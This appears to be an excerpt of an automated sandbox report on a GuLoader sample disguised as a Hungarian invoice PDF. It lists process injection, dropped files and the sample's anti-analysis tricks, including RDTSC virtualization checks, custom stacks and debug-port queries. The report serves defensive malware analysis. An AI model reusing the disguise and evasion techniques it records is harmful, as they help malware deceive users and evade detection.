            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"Jump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile written: C:\Windows\Resources\0809\mysterist.iniJump to behavior
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SkCSKJeVGx.exe, 00000006.00000002.2970784574.00000000007DE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBC1B63
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_6FBC2FD0 push eax; ret 0_2_6FBC2FFE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335609AD push ecx; mov dword ptr [esp], ecx5_2_335609B6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B427FA pushad ; ret 7_2_04B427F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B4225F pushad ; ret 7_2_04B427F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B4283D push eax; iretd 7_2_04B42858
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B709AD push ecx; mov dword ptr [esp], ecx7_2_04B709B6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B418F3 push edx; ret 7_2_04B41906
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C6C715 pushad ; retf 7_2_02C6C718
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5E8DC push ds; retf 7_2_02C5E8E3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C7091D pushad ; iretd 7_2_02C7091E
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C60CA1 push CD2A7FC7h; retf 7_2_02C60CA6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5149A pushfd ; ret 7_2_02C5149D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C51AD6 push ss; retf 7_2_02C51B12
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C67A01 pushad ; ret 7_2_02C67A05
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C61B79 push es; ret 7_2_02C61B78
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C61B12 push es; ret 7_2_02C61B78
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C578D4 push eax; retf 7_2_02C578D5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C6F84F push esi; ret 7_2_02C6F857
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C6B9DF push ebx; ret 7_2_02C6B9EB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C67C19 push esi; ret 7_2_02C67C27
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C67C20 push esi; ret 7_2_02C67C27
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeAPI/Special instruction interceptor: Address: 54464CE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeAPI/Special instruction interceptor: Address: 20464CE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeRDTSC instruction interceptor: First address: 540467D second address: 540467D instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDA20535368h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeRDTSC instruction interceptor: First address: 200467D second address: 200467D instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDA20DE4298h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD1C0 rdtsc 5_2_335DD1C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\sdchange.exeAPI coverage: 1.2 %
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2834132563.000000000340A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945141009.00000000033FE000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2834132563.00000000033FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|`
            Source: sdchange.exe, 00000007.00000002.2971107059.0000000002EC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4984
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4976
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD1C0 rdtsc 5_2_335DD1C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A35C0 NtCreateMutant,LdrInitializeThunk,5_2_335A35C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBC1B63
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559353 mov eax, dword ptr fs:[00000030h]5_2_33559353
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559353 mov eax, dword ptr fs:[00000030h]5_2_33559353
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F367 mov eax, dword ptr fs:[00000030h]5_2_3361F367
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603370 mov eax, dword ptr fs:[00000030h]5_2_33603370
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D34C mov eax, dword ptr fs:[00000030h]5_2_3355D34C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D34C mov eax, dword ptr fs:[00000030h]5_2_3355D34C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635341 mov eax, dword ptr fs:[00000030h]5_2_33635341
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567370 mov eax, dword ptr fs:[00000030h]5_2_33567370
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567370 mov eax, dword ptr fs:[00000030h]5_2_33567370
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567370 mov eax, dword ptr fs:[00000030h]5_2_33567370
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362132D mov eax, dword ptr fs:[00000030h]5_2_3362132D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362132D mov eax, dword ptr fs:[00000030h]5_2_3362132D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E930B mov eax, dword ptr fs:[00000030h]5_2_335E930B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E930B mov eax, dword ptr fs:[00000030h]5_2_335E930B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E930B mov eax, dword ptr fs:[00000030h]5_2_335E930B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557330 mov eax, dword ptr fs:[00000030h]5_2_33557330
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F32A mov eax, dword ptr fs:[00000030h]5_2_3358F32A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F3E6 mov eax, dword ptr fs:[00000030h]5_2_3361F3E6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336353FC mov eax, dword ptr fs:[00000030h]5_2_336353FC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361B3D0 mov ecx, dword ptr fs:[00000030h]5_2_3361B3D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B739A mov eax, dword ptr fs:[00000030h]5_2_335B739A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B739A mov eax, dword ptr fs:[00000030h]5_2_335B739A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336013B9 mov eax, dword ptr fs:[00000030h]5_2_336013B9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336013B9 mov eax, dword ptr fs:[00000030h]5_2_336013B9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336013B9 mov eax, dword ptr fs:[00000030h]5_2_336013B9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335933A0 mov eax, dword ptr fs:[00000030h]5_2_335933A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335933A0 mov eax, dword ptr fs:[00000030h]5_2_335933A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335833A5 mov eax, dword ptr fs:[00000030h]5_2_335833A5
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363539D mov eax, dword ptr fs:[00000030h]5_2_3363539D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362D26B mov eax, dword ptr fs:[00000030h]5_2_3362D26B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362D26B mov eax, dword ptr fs:[00000030h]5_2_3362D26B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359724D mov eax, dword ptr fs:[00000030h]5_2_3359724D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559240 mov eax, dword ptr fs:[00000030h]5_2_33559240
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559240 mov eax, dword ptr fs:[00000030h]5_2_33559240
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A1270 mov eax, dword ptr fs:[00000030h]5_2_335A1270
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A1270 mov eax, dword ptr fs:[00000030h]5_2_335A1270
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33589274 mov eax, dword ptr fs:[00000030h]5_2_33589274
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361B256 mov eax, dword ptr fs:[00000030h]5_2_3361B256
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361B256 mov eax, dword ptr fs:[00000030h]5_2_3361B256
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635227 mov eax, dword ptr fs:[00000030h]5_2_33635227
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597208 mov eax, dword ptr fs:[00000030h]5_2_33597208
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33597208 mov eax, dword ptr fs:[00000030h]5_2_33597208
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336352E2 mov eax, dword ptr fs:[00000030h]5_2_336352E2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B2D3 mov eax, dword ptr fs:[00000030h]5_2_3355B2D3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B2D3 mov eax, dword ptr fs:[00000030h]5_2_3355B2D3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B2D3 mov eax, dword ptr fs:[00000030h]5_2_3355B2D3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F2D0 mov eax, dword ptr fs:[00000030h]5_2_3358F2D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358F2D0 mov eax, dword ptr fs:[00000030h]5_2_3358F2D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
